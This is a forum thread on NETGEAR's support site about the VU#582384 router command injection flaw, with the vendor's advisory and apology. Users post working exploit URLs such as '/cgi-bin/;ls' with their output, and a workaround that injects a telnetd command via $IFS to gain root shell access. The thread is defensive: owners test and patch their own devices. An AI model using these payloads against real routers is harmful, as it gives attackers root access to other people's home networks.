NETGEAR is aware of a growing number of phone and online scams. To learn how to stay safe click here.
Forum Discussion
Solved
NETGEAR Routers and CVE-2016-582384 security vulnerability
I am a bit concerned about this recent article: http://www.zdnet.com/article/two-netgear-routers-are-vulnerable-to-trivial-to-remote-hack/ https://www.kb.cert.org/vuls/id/582384 Details: Overview Net...
NETGEAR is aware of the security issue #582384 affecting R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400 routers. Stay updated here: http://kb.netgear.com/000036386/CVE-2016-582384We now have beta firmware containing fixes for some affected models.
We're working hard on fixes for the other affected models and will update the security ticket above soon.
**** UPDATE from NETGEAR - Added by ChristineT on 12/15/16 at 10:30 AM PST ****
To our NETGEAR Community, we sincerely apologize for any complications you may have encountered due to the recently publicized vulnerability, referred to as VU 582384. We initially became aware of this vulnerability last Friday when CERT emailed us, and because we had no record of a prior report, we began our standard process of validation prior to making any public statements.
Once it had been disclosed that the first notification actually occurred in August, we conducted a search and confirmed this was the case. Admittedly, this was an oversight on our part. While no security reporting system is perfect, we aim to do better, and are evaluating how to improve our response process.
NETGEAR has created a channel for security researchers and other members of the public to contact us regarding potential security issues affecting NETGEAR products (security@netgear.com), which is publicly disclosed from the NETGEAR Product Security Advisory page. We receive numerous emails through this channel, the overwhelming majority of which, on review, do not raise product security issues. When we do recognize that there is a security risk to our customers, we work diligently to address them in a timely manner, as we have done in this case since learning about it last Friday.
Security Advisory for VU 582384 knowledgebase article.
NETGEAR Product Security Advisory page.
I tried using a supposed exploit from HERE and entered for the URL http://192.168.1.1/cgi-bin/;ls and all I see is partial HTML display?
Entering http://192.168.1.1/cgi-bin/;COMMAND did the same?
Am I missing something here?
My router is at 192.168.1.254. First, I checked by going to the router web GUI and received the authentication page, since I was not logged in. I wanted to make sure my login was not cached.
Then, I did exactly what you did. I copied your link with the "ls" in the line, substituting .254 for .1.
Here is what I got back -- and yes, it is a partial HTML display, but it is a valid and proper response to the ls command -- it gave a directory listing:
bin dev etc lib media mnt opt proc sbin share sys tmp usr var www
I was using a Chrome browser on a Mac, but that should not matter. Bottom line - at least for me is that it ran the ls command.
I am going to try to go back to a previous SW release and hope it works without the flaw. Otherwise, I will have to try Tomato or DD-WRT, and I really do not want to have to do that and reset everything.
SUCCESS! ! !
At least for the R8000 router.
I downgraded to V1.0.2.46_1.0.97, which is the most recent non-current version. The downgrade with flawlessly -- no problems at all. I did not loose any settings, so all seems to be working. I tried the exploit and it did not work. Like others have reported (after making sure I was logged out of the router), it returned a page saying I was not authorized.
I hope Netgear will provide a new software update for the router. I do not like running an old version -- I feel like there were probably some problems that were fixed in the newer version, but the newer version has an extremely dangerous flaw.
Someone mentioned connecting via the internet (WAN) side vs the LAN or home side. The PROBLEM is, that your web browser AT HOME, within your LAN could go to a web page, even on a well known site that has a link on a picture (or like within an ad) that has that command embeded. You do not have to type it in to the top line. It can be an embeded link, and it will run the link and affect the router.
But -- good for now -- or at least, I feel safer.WOOPSEY -- I was wrong.
It seemed like the fix (downgrading) worked. I even tried a couple of time. But after closing the web browser and going back to try again (I was going to try with and without the cgi-bin in the line -- it FAILED. That is, it returned the directory listing. I checked, and the router is reporting the older software, so for some reason, it does not work either, and is subject to the flaw. I will be going back to the current software, but still looking for a fix. It looks like a basic problem.
So, just to confirm, with the older software V1.0.2.46_1.0.97, I still have the problem.
Drat. Sorry to hear it. I tried doing what you described with my R7000 and it seems to still be "safe". I will treat it as a "suspect work-around".
Thanks for the update.
Yes, I did get that at the bottom,
=========
bin dev etc lib media mnt opt proc sbin share sys tmp usr var www
However there was upteen lines above it with partial HTML:
alue) { var button; button=document.getElementsByName('buttonHit'); button[0].value=btn.name; button=document.getElementsByName('buttonValue'); button[0].value=value; return true; } function clickButton(message) { alert(message); } function mainOnload() { } function changeCursorPointer() { document.body.style.cursor='pointer'; } function changeCursorDefault() { document.body.style.cursor='default'; } function iframeResize(iframe){ alert("Enter iframeResize "+iframe); if(iframe && !window.opera){ if(iframe.contentDocument && iframe.contentDocument.body.offsetHeight){ alert('before '+iframe.height+" document "+iframe.Document.body.offsetHeight); iframe.height=iframe.contentDocument.body.offsetHeight+80; alert('after '+iframe.height); } else if(iframe.Document && iframe.Document.body.scrollHeight){ alert('before '+iframe.style.height+" document "+iframe.Document.body.scrollHeight); iframe.style.height=iframe.Document.body.scrollHeight; alert('after '+iframe.style.height);Literally hundreds of lines like that.
Although the end is the expected output does that really mean 'something' could be done to/on the router?
I would assume - yes. You asked for a directory listing, and it gave it to you. The report is, that telnet worked also. I could not think of an easy command to use that would prove a security breach without doing harm. I have gone back and forth with the old and new software a couple of times now, and have made sure that browser cache was cleared each time, and that I was not logged into the router. And, it FAILED every time. That is, even with the older software, the security problem still existed. I got a directory listing with the "ls" command issued.
I will have to try Tomato this afternoon. Or go buy (another) new, expensive router.
TEmporary solution can be found here.
tl;dr – a quick overview
Here are the three steps (explanation below):
- Open a web browser and visit the following URL:
http://[router-address]/cgi-bin/;telnetd$IFS-p$IFS'12346'
(it’ll look like it’s loading a page, just leave the window open and continue with the next step) - Type the following in a console / terminal window / command prompt:
telnet [router-address] 12346
You will (should) now have BusyBox root access to your router. - Type in the following to terminate the router’s web server process:
killall httpddone!
- Open a web browser and visit the following URL:
